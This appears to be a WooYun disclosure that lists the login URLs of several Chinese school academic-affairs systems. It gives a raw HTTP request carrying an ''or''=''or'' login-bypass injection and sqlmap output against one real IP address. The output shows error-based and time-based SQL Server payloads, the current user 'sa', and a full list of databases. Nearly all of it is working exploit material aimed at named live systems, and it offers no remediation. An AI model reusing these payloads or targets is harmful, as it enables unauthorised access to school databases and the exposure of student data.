WooYun.org

http://jwxt.hifa.edu.cn/jiaowu/jwxs/login.asp
http://221.232.159.24/dhjw/jwxs/login.asp
http://jiaowu.hustwenhua.net/jwxs/login.asp
http://xscx.cmcedu.cn/jwxs/login.asp
http://jwxt.hycgy.com:5000/jwxs/login.asp

POST /dhjw/jwxs/login.asp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://221.232.159.24/dhjw/jwxs/login.asp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 221.232.159.24
Content-Length: 108
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: LoginLb=; ASPSESSIONIDCSACRCTD=MMHJDOJDHFEIOOCPPELOLJME
datetime=2015-3-23+13%3A12%3A50&loginNum=&Account=%27or%27%3D%27or%27&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: Account
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: datetime=2015-3-23 13:12:50&loginNum=&Account=-2532' OR 7256=CONVER
T(INT,(SELECT CHAR(113) CHAR(106) CHAR(112) CHAR(122) CHAR(113) (SELECT (CASE WH
EN (7256=7256) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(118) C
HAR(113) CHAR(113))) AND 'ogOj'='ogOj&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: datetime=2015-3-23 13:12:50&loginNum=&Account=-4128' OR 4975=(SELEC
T COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS s
ys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'QvyA'='QvyA&Passwor
d=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1
---
[13:47:47] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[13:47:47] [INFO] fetching current user
you provided a HTTP Cookie header value. The target URL provided its own cookies
 within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] Y
[13:47:49] [INFO] retrieved: sa
current user:    'sa'
[13:47:49] [INFO] fetching current database
[13:47:49] [INFO] retrieved: dhjw
current database:    'dhjw'
[13:47:49] [INFO] fetching database names
[13:47:49] [WARNING] reflective value(s) found and filtering out
[13:47:49] [WARNING] the SQL query provided does not return any output
[13:47:49] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[13:47:49] [INFO] fetching number of databases
[13:47:49] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[13:47:51] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
[13:47:52] [ERROR] unable to retrieve the number of databases
[13:47:52] [INFO] retrieved: dhjw
[13:47:52] [INFO] retrieved: master
[13:47:52] [INFO] retrieved: tempdb
[13:47:53] [INFO] retrieved: model
[13:47:53] [INFO] retrieved: msdb
[13:47:53] [INFO] retrieved: ReportServer
[13:47:53] [INFO] retrieved: ReportServerTempDB
[13:47:53] [INFO] retrieved: dhjw
[13:47:54] [INFO] retrieved:
available databases [7]:
[*] dhjw
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[13:47:54] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 23 times
[13:47:54] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\221.232.159.24'
[*] shutting down at 13:47:54